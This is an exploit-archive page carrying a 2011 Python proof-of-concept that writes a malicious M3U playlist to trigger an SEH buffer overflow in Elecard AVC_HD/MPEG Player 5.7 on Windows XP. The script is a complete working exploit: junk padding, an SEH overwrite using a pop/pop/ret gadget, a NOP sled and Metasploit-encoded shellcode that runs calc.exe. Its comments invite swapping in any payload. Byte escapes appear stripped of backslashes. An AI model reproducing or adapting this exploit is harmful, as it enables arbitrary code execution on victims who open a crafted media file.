Home / exploits Elecard AVC_HD/MPEG Player 5.7 Buffer Overflow
Posted on 28 February 2011
#!/usr/bin/env python # Software: Elecard AVC_HD/MPEG Player 5.7 (SEH) # Author: sickness # Download : http://www.elecard.com/en/products/end-user-software/playback/avchd-player.html # PoC for Elecard MPEG: http://www.exploit-db.com/exploits/16237/ # Tested : Windows XP Professional SP3 (EN) latest updates # DATE : 26/02/2011 # Bad chars: x00x0ax0dx25x68x08 There might be more so watch out ! ################################################################### # You might need to change the offset. # The payload can be replaced with whatever you want, there is enough space. ################################################################### import sys header="#EXTM3U " junk="x42"*4 nseh="xebx06x90x90" seh="xA6xA0x94x73" # p/p/r from D3DIM700.DLL nops = "x90"*16 # msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b "x00x0ax0dx25x68x08" -t c sc = ("x6ax32x59xd9xeexd9x74x24xf4x5bx81x73x13xfdx1e" "x9fxecx83xebxfcxe2xf4x01xf6x16xecxfdx1exffx65" "x18x2fx4dx88x76x4cxafx67xafx12x14xbexe9x95xed" "xc4xf2xa9xd5xcaxccxe1xaex2cx51x22xfex90xffx32" "xbfx2dx32x13x9ex2bx1fxeexcdxbbx76x4cx8fx67xbf" "x22x9ex3cx76x5exe7x69x3dx6axd5xedx2dx4ex14xa4" "xe5x95xc7xccxfcxcdx7cxd0xb4x95xabx67xfcxc8xae" "x13xccxdex33x2dx32x13x9ex2bxc5xfexeax18xfex63" "x67xd7x80x3axeax0exa5x95xc7xc8xfcxcdxf9x67xf1" "x55x14xb4xe1x1fx4cx67xf9x95x9ex3cx74x5axbbxc8" "xa6x45xfexb5xa7x4fx60x0cxa5x41xc5x67xefxf5x19" "xb1x97x1fx12x69x44x1ex9fxecxadx76xaex67x92x99" "x60x39x46xeex2ax4exabx76x39x79x40x83x60x39xc1" "x18xe3xe6x7dxe5x7fx99xf8xa5xd8xffx8fx71xf5xec" "xaexe1x4ax8fx9cx72xfcxc2x98x66xfaxec") rest = "x90"*(21000-len(header+junk+nseh+seh+nops+sc)) exploit = header +junk + nseh + seh + nops + sc + rest try: f=open("evil.m3u","w") f.write(exploit) f.close() print "Done!" except: print "Something went wrong!"
